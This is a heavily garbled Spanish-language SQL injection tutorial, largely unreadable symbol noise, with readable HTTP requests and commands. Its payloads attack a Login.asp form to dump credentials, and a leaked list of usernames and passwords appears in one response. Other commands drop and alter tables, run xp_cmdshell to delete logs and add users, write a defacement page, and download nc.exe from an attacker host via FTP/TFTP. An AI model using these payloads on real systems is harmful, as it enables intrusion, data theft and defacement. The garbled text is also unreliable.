,5;: 9 " " 9 " #$% " " (! * " 9 9 " < =" ># > & #$% " " " " 4 " 9 " < " & 6 7 " " " " " " " " " 8 " I #$% " + " " 9 1H5 ' 5 " " ) " " " ! <1 " " ! M " " %"# " " " , " " , M " , E1 ) " " # " !G# E' " D F " + " " " < " ! & " > > . > " E! .J & " " "& " " ) " " ) " ) " " 6" " > >& 9 ;:,5 * " )4 6 & b 1;5 ) +8 > . " , & " & 9 F . . " & "" . ) 6 " " EA 7 4 " + >5 6 6 " " 1H5 ' 5 " >9 4 > # " 6" 4 # # " " " # )!% #, " " " ." , " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " ' ( " . - " " " 4 " F " " . &9 " < ' " 5 + ` a>& #$% & 6 " " " " 4 " 9 " " " " 4 " * > ,> 8" * IIF " ! :M& 4 * * " ( " ) "& . " " + " F " " > . F 9 " " 9 " . " " ) "& + " " * >86 "& " "" " 4 E% " 9 9 " + 2 4; ! 6 ( " " " )4 * " 6 & #! ! . !< #$%& !& (! ( " * ( . " >) 6 " ) " " 7 " 9 " ) " = # (! , 8 .= . "& . & " "9 " " A=4 " 9 * 4 . " " "" ( 7 " " " ! > $6 3 / % #$% " * H 6 . ." " 6 !:#; > * ) ) . " " " " " ) " ) 6 " * & " (! 6#; ! " ) " E% 9 " 6 " " " * "6 " 6 " " & " ( * 1;: 9 " . " 6" ( F * " " , + !G# F+6 " * 9 ) = + POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y 2 H + <V W < L [L L[ <[ -> $6 3 , 8 <6 "[L]L* . 6 ( " #8%8'; ! EB " " F" <VLL " U <" < " (! 6#; ! " & " ) ) " ( " < + 7 " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 76 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-&txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " Y H + ) " ( " * "L " ) " !:#; " 4 * <& & & * * < 00 & " " 6 * :,-' 6 6 .) " . " " Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14 05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy; 22 carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2 11095;victor... /Login.asp, line 85 2> $6 3 4! & ! 6 ( ) ( , :!& " " " " (! 6#; ! ") " & "& " ) " . 4 ". + POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . Y H + L] ) < 00 - 6! ; " ! " " 6 " " "& 9 "" " " ") ." " " " ( " . 6 6 " . ) "9 &" " . " 5 " " "9 ) " " " * & " " " """ "& * & " " " . . " $+6 4 H " "" !,5;8 4 9 " " " . " "" 6= !:#; + ( " 23 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L " "" "VL1 6 ! ""L VL' L00 +4 4 4 # & . + 9 " * " E5 9 ." 9 " H " #$% # 6 F !:#; " & . " * 'delete from usuarios where UID='Usuario'-- + 1 4 $ " 4 " " " & 4 1#8 ;& ) & " " 9 + " " " & KKKF 9 "& " " " " " " 6 . " . = " ( "& + "9 9 6 " " ) " 7 . " " & " " ) " "" ") " ( " E' " & ( ! . & + " 4 . 9 = 6 " 9 " " 2? 5"= " ". " & " 9 = ( " . " ) " 9 <" " " " " ) " & 9 " " " !:#; 6= :)6 7< * 9 " + . " " "+" " " 1#8 ; * " 4 " " + & " + & 6 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L] " " "6 " EL + " L&L +! "" LF00 % & " ( & ! . ! . " 7 " " ) " 6" " & < "" " " " * 6 "* " >8< " #$% 1: "9 # ! 4 * " " " * " " ! ) ( " & " . " * #$% # 6 "> " " $ % " ) " II . # " " " 6 " ?4; < $ " " " " 8< " " #0#$%& " ") " 5 . " "& # " & ,%%L" 9 " & * #0#$% ) < " " ") " " " " < "& . 2@ " " & " 5 " < " "& " ) * ) " * " " " N Q " > "> 4 " " "& " "" " " < Q " " K6 " ;;! ) " " " " " 4 " " "9 " ( = " " "" " " 9 " " + " " " ( 6 6= #$% " ". " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + "L]8N8' " ) < Q " L < L00 :M 9 E , ) " " " 6 = ) " * " " * 5 " " ) . 4 " ) 4 " = ) &6 6 " " = " 4 & " " " )" 6 " * "6 "6 " E8 " " " "F + < Q ) ) 4 ") " > > " " < Q ( " . " * " " "* E/ & . & " "1 & 9 #5 F " " 9 " " & F " " 2 ! " EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\' ! 6 9 6 EXEC master..xp_cmdshell 'type c:\inetpub\wwwroot\alguna_pagina.asp' ! " ) EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe c:\inetpub\wwwroot\chroot.exe' ! ) " EXEC master..xp_cmdshell 'DIR c:\winnt\system32\logfiles\w3svc1\' EXEC master..xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"' EXEC master..xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc1\ filelog.log' EXEC master..xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"' ! 6 " EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master..xp_cmdshell 'NET USER username password' :M& " ) . " 8< " " " . ">& " " " " # " >8< # " )7 ) " + ! ">& " " " " & >1 4 " " 'exec master..sp_addlogin MyUser, MyPass 9 ; " " ! " = " . " " ) 6 &" * & . . " ) & " " " "> + >8< # ! "> 9 ) = " " ! " " " " " & #0#$% # 6 " * " "+" " " 6 "* " " " ) " 9 " " ># " " ) " "* " + " " 2B " " " " " Q Q Q " Q *. Q "6 + ) - $ %+ ) % " " " 4 & ) * ( ) Q . Q ) "M Q . Q . Q . M + & * " " * + " % " < < < < > * " +( 9 :,-'F& " " " 322& 9 " # ) 7 9 9 < < < < < & " " " " " "+ 7 ' 4 " & " " " H " " . " " " ( " " " ) 4 " " + #$% 9 4 > "& 9 " " ( 67" < #$% E$ + " #$% 6= #5& " ) * " #$%& ) " "" ) " & ". " . " 1 & M <& 6 Q . 6 Q" 6 Q " Q Q 6 . &9 4 . " > . (( # < " " " . "* . " + " . . * + ; " >& 7 " " ----- Extracto -----------------------------------------[...] La idea es crear una pagina html o asp, si en el sitio objetivo se encuentra activo y funciónando un webserver [...] declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\web-hosting\attajdid\index3.html', 1 exec @ret=sp_oamethod @f, 'writeline', NULL, '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>' 2C exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY> <TR> <TD bgColor=#d20000>&nbsp;</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f, 'writeline', NULL, 'bgColor=#d20000>&nbsp ;</TD></TR><!--" "-></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos.- Creamos un archivo get.txt para utilizar luego ftp declare @o int, @f int, @t int, @ret int EXECUTE sp_oacreate 'scripting.filesystemobject', @o out EXECUTE sp_oamethod @o, 'createtextfile', @f out, 'c:\get.txt', 1 EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit' EXECUTE master.xp_cmdshell 'FTP -s c:\get.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET c:\mi_local_file c:\remote_file' 3 ----- Extracto -----------------------------------------:M& ) )4 " 6 " *=" " " " " # 6 " . E . " 9 " 8 " 4 " . & ) " " " " ( " * " 6" " #0#$% # 6 & ") " . " " &" " Q +" Q 9 " " )4 :%8 " " * #$% " . * "+" )4 F + " 7 " )4 6 " ) " " ; " Q . &c " & M : ;! ; < a )4 `& ; " Q )4 `& 6 `&` ` aa M & : ;! ; a Va " 3 # ) " " ) " 9 7 9 & "IF * ) 5 * + " 7" 6 " " &9 "& " 6" " " " . " D " ) + = " & J " " " ) ) " " * " " >; "" " " ) " " & " + " . &" 7 " " : . " " G )5 " " " L 1;: : ;A %8L > > + = " "+ ) & + #$% 9 6 ) <" 6 " ( " E: ) = " * " " " #$% + " ) # " " +! 4 > " " #$% 4 * # ' % #0#$% ) . ") " " 0 , " "9 9 " .J #$% 4 ) 4 " ! " ` : ;! ; a = " " J "" " + 3 03 ! # )" " ") " 1 :1 " ) H " 1 " J " "" 0 +,# )" " ") " 1 :1 " ) ! "5 1 " J " E *Q* KF " " "" " " F 0$ . # ':!S E8 " # )" " ") " 1 :1 " ) ! "5 J "" "" " " ) "K 0 # )" " ") " 1 :1 " ) ! "5 " J "" "" " ) "K " " "" " E< Q " &" Q " F "@ % " * & A . * 7 " ' " " . . " . " & 9 " & " 4 " & "& " 7 . " 6 7 . " 6 " . * % " " " * " 6 " ) " " " " ". ( #0#$% " " " " " " " " ( " ( & ") 6 " ) ) # 6 " " 6 " " "9 " J " " 6 " ) " " "9 ! 4 *=" " "" 6 8" ) ( ! = ' ( # * * " " < + " ;'! 322 + ,! 323F 1 " " 6 " ) " " 6 1 " " = & " " " " ! M "" "" 6 " A " 6= " " ) " = " 8" " 6 #$% " 6 3 ! " " " . " . * . E, " 6 " ) " "" " . ( & M" ) *. F H *9 6 " " " " " #0#$% # 6 8" ) ( " 6 . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . 6 " * " * E " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " . & " " " * " ." 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ) " " "A % B #0#$% # 6 " 6 " " 6 " . & 9 . 6 ( " " " " ' " 6 " . 6 8 ! " " . 9 " " * " & +" ") " 7 " + " " * " " " ") " " " ) + +" ( " " " ) 4 " 6 " " " . " & " " + " "" ") " & ") < M ." ) #0#$% # 6 " " 6 & <" "9 " " + "* " " +# 6 "! " ) " "& 6 " " . G " " " " " . > + " " " ) = 6 " #$% 4 # ) * " " * M . * " "* "& " " ) = " . 6 ) " ) " " " " " . ( # #;8 5 G " . ( M" ". " ) " . " "" " 9 " ) " + = " 7< " + " " 8 " G " "" "+ " " " " 6 " E; " " 9 " " " " 7 " " " "& 6 " " "& . " . 6" " " . " " " . "& " "A = & *. " "" * " * & " ) "" 6 > .= " ) " ) " *= 4 & 74 . " & " & " * " " #0#$%F 8" . " D " ". * ) 32 ' 6 G " 2& + " " ") "9 " " " " ) " " " . E5 ( " 5 "& , 6 " # . & 8A#& F "= )7 %81;: " * " ( " " " " * & " " 9 ". ) " " #0 #& #0#$%& # " " 8 !& " " ) ( " * & " . &+ 9 #:- 8 " " 6 5 " " " 9 # " 9 + " " " " " 6 " . 6" " " " "& + 5 " >5 . ! "C ) " + " 6 " " " " > " * 7 " + % " 9 " # M . 8< " M . "9 " 7 " #$% " ' " < % & ! & G " > E #-1 B303B 022CB0@F M " Q QG " "9 "9 Q 3 + " * "9 6 6 " + " + " " #$% 4 G ! * " " " .Q#$%Q# 6 Q " .Q#$%Q 4 * < . "" " 6 Q"9 Q 4 * < . "" " Q 6 Q"9 Q 4 * < . "" " 0#$% * < . "" " M .0"9 0 "" " * < . "" "6 .Q ) " Q" + * " " + 6 " ?,! 1 ! @8 " . " Q6 "9 " " "D ! M " M " M " " < + + * .' " M M M " #9 )* ( +9 " " 5 & > * - M > " " "* 4 " ) & "> < 6 6 33 M M M M " " " " << " " " " " " + . 1; " " #9 M ( + . G "9 < + . G "9 .( + + . )5 "0 0 @0) ( " "* " " " M + "B 01 0 0' 0S " " , :! "9 " . II )+ 5 . ' % . " " " * " ) ") "I )+ 5 . 6. 8 " * * " * " )+ 1 F )+ " 59 = . & " 6 = " . " = &+9 . " ) 9 " " . D . & . 1 " ( + . 6 " " " " " " " . (( # + ; > > < 1 ) " ) " " " + 9 " ") 6 9 9 " " " " "6 " "* ( " " ") ( " 9 " " " ( & 9 " * "9 " "& " < ") " "" " " " " " " " )7 . " " / " " 6 " * " * ; " & = " " MQJ % ! ( ( ** = " . " " ; " " / ! 9 " # & . " " " 5 " >5 . ! = #0#$%& "9 + 67" " +# * " " . " " #$% 4 % d " " " * > 9 " & # 9 . " " E8" " " " " . "J . " <" " " " " . "KF " " 9 D " +* O1 <